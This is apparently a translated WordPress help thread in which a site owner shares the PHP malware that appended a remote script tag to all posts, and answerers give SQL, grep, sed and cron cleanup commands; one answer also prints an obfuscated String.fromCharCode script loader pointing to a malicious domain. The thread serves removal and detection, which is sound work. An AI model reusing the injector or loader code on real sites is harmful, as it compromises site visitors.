如何批量删除所有WordPress帖子的某一部分

时间:2020-08-12 作者:Matthew

网站被黑客入侵,所有帖子都在内容下注入了一行js代码!

<script src=\'https://js.xxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>
我在根目录中找到了恶意软件文件,该文件使用以下命令注入JS代码:

$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE \'%post%\'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]."  LIMIT 1 ";
    $result2 = $conn->query($q2);
    if ($result2->num_rows > 0) {
        while($row2 = $result2->fetch_assoc()) {
            $val = $row2[\'post_content\'];
            if(strpos($val, "js.donatelloflowfirstly.ga") === false){
                if(strpos($val, "js.donatelloflowfirstly.ga") === false){
                    
                
                    $q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\\"<script src=\'https://js.donatelloflowfirstly.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>\\") WHERE post_content NOT LIKE \'%js.donatelloflowfirstly.ga%\'";
                    $conn->query($q3);
                    echo "sql:" . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"];
                
                } else {
                
                }

            } 
        }
    } else {
    }
    }
} else {
}
$conn->close();
有人请帮助我使用MYSQL命令,以便我可以从PHPmyadmin中删除此代码。

3 个回复
SO网友:Behemoth

转到PHPmyadmin。单击数据库并运行以下SQL查询:

UPDATE wp_posts SET post_content=(REPLACE (post_content, \'https://js.xxxxxxx.ga/stat.js?n=ns1\',\'\'));  
上面包含js脚本src。我们只是在删除它。

这种情况的发生有很多原因。你必须找出确切的感染源。这主要发生在盗版/无效主题中。我们将按照以下步骤成功地解决此问题。

设置:使用VS代码或类似的支持;“在文件中搜索”;选项(不是记事本++)
  • 下载最新的WordPress(您正在使用的版本)
    1. 解决方案:

      1. 从服务器下载项目的完整备份,并将其放在某个文件夹中(例如project dev)dir/“密码”;或“或”;id/密码“;在if语句中后跟一些散列,然后删除该散列,直到正确的注释行。(大多数主题都是从注释开始的)
      2. 确保主题中的所有文件都是必需的。你已经没有这样的代码了
      如果您被卡住了,请与我联系[email protected]

    SO网友:Matthew

    致@Behemoth感谢您的回复!我刚刚用“编辑了您的命令”;因为js代码中有,所以它可以工作!

    UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src=\'https://js.xxxxxxx.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>", \'\');
    
    我使用付费主题,一些付费插件,但2个无效插件,这太可惜了!现在正在寻找一些工具来检查代码!希望能找到后门。。。

    SO网友:user193835

    这是我针对linux centos的命令列表:

    1. remove malware scripts

    find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
    find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
    
    将此命令放在cron中以保持服务器干净(如果在服务器中发现恶意文件,则每15分钟删除一次):

    # execute every 15 minutes
    */15 * * * *  find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
    

    2. clean cache from WP plugin

    3. clean db

    使用此sql查询

    #check affected records
    SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
    SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
    SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
    SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
    SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
        
    
    #clean db
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://js.donatelloflowfirstly.ga/stat.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type=\'text/javascript\' src=\'https://js.donatelloflowfirstly.ga/stat.js?w=1\'></script", \'\'));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://js.donatelloflowfirstly.ga/statistics.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://js.donatelloflowfirstly.ga/statistics.js?n=ns1"" type=""text/javascript""></script>", \'\'));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=\'https://scripts.lowerbeforwarden.ml/src.js?n=ns1\' type=\'text/javascript\'></script>", \'\'));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://scripts.lowerbeforwarden.ml/src.js?n=ns1"" type=""text/javascript""></script>", \'\'));
    
    
    #recheck if all is clean
    SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
    SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
    SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
    SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
    SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%"
    

    4. check and clean malicious code inside the file

    检查纯文本恶意代码:

    cd /var/www
    grep -rlF "donatello"
    grep -rlF "blackwater"
    grep -rlF "lowerbeforwarden"
    
    以纯文本形式注入的干净代码:

    grep -rlF "donatello" | xargs sed -i "s/<script type=\'text\\/javascript\' src=\'https:\\/\\/js.donatelloflowfirstly.ga\\/statistics.js?n=nb5\'><\\/script>//g"
    grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type=\'text\\/javascript\' src=\'https:\\/\\/scripts.lowerbeforwarden.ml\\/src.js?n=nb5\'><\\/script>//g"
    
    如果转换数字字符串,请检查加密的恶意代码

    String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)
    
    在utf8中,将看到:

    h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s
    
    找到代码:

        grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"
    
    删除代码:

    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\\[0\\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\].appendChild(elem);})();<\\/script>//g"
    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\\[0\\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\\[0\\].appendChild(elem);})();//g"
    
    最后一个加密的字符串与;“lowerbeforwarden”;变种使用正确的顺序;多纳泰罗;。

    希望这有帮助。